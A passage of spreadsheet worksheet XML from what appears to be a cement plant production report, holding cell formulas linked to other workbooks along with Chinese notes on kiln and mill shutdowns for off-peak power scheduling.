      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]4'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'3'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'3'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]4'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]4'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]4'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'3'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]4'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'3'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]4'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'3'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'3'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]4'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]4'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]4'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'3'!U48</f>
        <v>0</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6026.53</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]4'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'3'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]4'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'3'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'3'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]4'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]4'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]4'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'3'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]4'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'3'!X49</f>
        <v>0</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176530.34</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]4'!$Y$8</f>
        <v>10593.625</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'3'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'3'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]4'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]4'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]4'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'3'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]4'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'3'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]4'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]4'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]4'!$E$24</f>
        <v>7119</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'3'!H51</f>
        <v>22481</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1398880</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]4'!$I$24</f>
        <v>4624.003</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'3'!K51</f>
        <v>22489.846</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1385613.777</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]4'!$L$24</f>
        <v>48843.8379999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>108.541862222222</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]4'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]4'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]4'!$R$30</f>
        <v>312.35</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'3'!U51</f>
        <v>1026.45</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>64024.921</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]4'!$V$30</f>
        <v>299.2</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'3'!X51</f>
        <v>960.388</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>61576.625</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]4'!$Y$30</f>
        <v>3317.43600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]4'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]4'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'3'!H52</f>
        <v>8e-11</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]4'!$I$19</f>
        <v>8227.459</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'3'!K52</f>
        <v>22260.88</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1303955.08</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]4'!$L$19</f>
        <v>82785.5630000503</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>57.0934917241726</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'[13]4'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]4'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'3'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]4'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'3'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]4'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]4'!$M$21+'[14]4'!$M$22+'[14]4'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]4'!$N$21+'[14]4'!$N$22+'[14]4'!$N$35</f>
        <v>44.43</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'3'!U53</f>
        <v>175</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38509.427</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]4'!$Q$21+'[14]4'!$Q$22+'[14]4'!$Q$35</f>
        <v>49</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'3'!X53</f>
        <v>266</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>39757</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]4'!$T$21+'[14]4'!$T$22+'[14]4'!$T$35</f>
        <v>1557.947</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]4'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'3'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]4'!$I$47</f>
        <v>2387.719</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'3'!K54</f>
        <v>4842.945</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>216284.795</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]4'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]4'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]4'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]4'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'3'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]4'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'3'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]4'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]4'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'3'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]4'!$I$63</f>
        <v>581.555</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'3'!K55</f>
        <v>581.555</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>36017.205</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]4'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]4'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]4'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]4'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]4'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]4'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]4'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]4'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]4'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'3'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'3'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]4'!$Q$62</f>
        <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:20避峰停机；3#磨：10:00-22:30避峰停机；4#磨：0:00-23:20大修续停。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G57+'3'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'3'!K57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G58+'3'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'3'!K58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G59+'3'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'3'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]4'!$Q$65</f>
        <v>窑:9:28点火升温，20:18投料。A组磨：8:10-24:00避峰停机。D1#磨：9:25-24:00避峰停机，D2#磨：9:25-24:00避峰停机。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G60+'3'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'3'!K60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'[14]4'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]4'!$E$6</f>
        <v>4910</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'3'!H61</f>
        <v>12478</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1128351</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]4'!$E$21</f>
        <v>3769.19</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'3'!K61</f>
        <v>14104.27</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1115264.35</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]4'!$H$6</f>
        <v>36142.8999999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>69.5055769230767</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'[14]4'!$M$11+'[14]4'!$M$12+'[14]4'!$M$13+'[14]4'!$M$14+'[14]4'!$M$15+'[14]4'!$M$16+'[14]4'!$M$17+'[14]4'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]4'!$N$11+'[14]4'!$N$12+'[14]4'!$N$13+'[14]4'!$N$14+'[14]4'!$N$15+'[14]4'!$N$16+'[14]4'!$N$17+'[14]4'!$N$18</f>
        <v>2077</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'3'!H62</f>
        <v>6231</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>842224.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]4'!$Q$11+'[14]4'!$Q$12+'[14]4'!$Q$13+'[14]4'!$Q$14+'[14]4'!$Q$15+'[14]4'!$Q$16+'[14]4'!$Q$17+'[14]4'!$Q$18</f>
        <v>3535</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'3'!K62</f>
        <v>9089</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>843561.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]4'!$T$11+'[14]4'!$T$12+'[14]4'!$T$13+'[14]4'!$T$14+'[14]4'!$T$15+'[14]4'!$T$16+'[14]4'!$T$17+'[14]4'!$T$18</f>
        <v>15596.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>62.3865359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]4'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]4'!$M$19+'[14]4'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]4'!$N$19+'[14]4'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'3'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]4'!$Q$19+'[14]4'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'3'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]4'!$T$19+'[14]4'!$T$20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G64+'3'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'3'!K64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G65+'3'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'3'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]4'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:14:30-22:20避峰停机。2#磨:8:00-22:30避峰停机。3#磨:14:40-22:10避峰停机。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G66+'3'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'3'!K66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G67+'3'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'3'!K67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'[15]4'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]4'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'3'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]4'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'3'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]4'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]4'!$Q$77</f>
        <v>1#磨正常运行。2#磨14:30-23:15避峰停机:8.75小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]4'!$D$43+'[15]4'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]4'!$E$43+'[15]4'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'3'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]4'!$H$43+'[15]4'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'3'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]4'!$K$43+'[15]4'!$K$44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'[15]4'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]4'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'3'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]4'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'3'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]4'!$K$45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G71+'3'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'3'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]4'!$Q$80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G72+'3'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'3'!K72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G73+'3'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'3'!K73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G74+'3'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'3'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]4'!$Q$83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G75+'3'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'3'!K75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G76+'3'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'3'!K76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G77+'3'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'3'!K77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G78+'3'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'3'!K78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'[16]4'!$E$7</f>
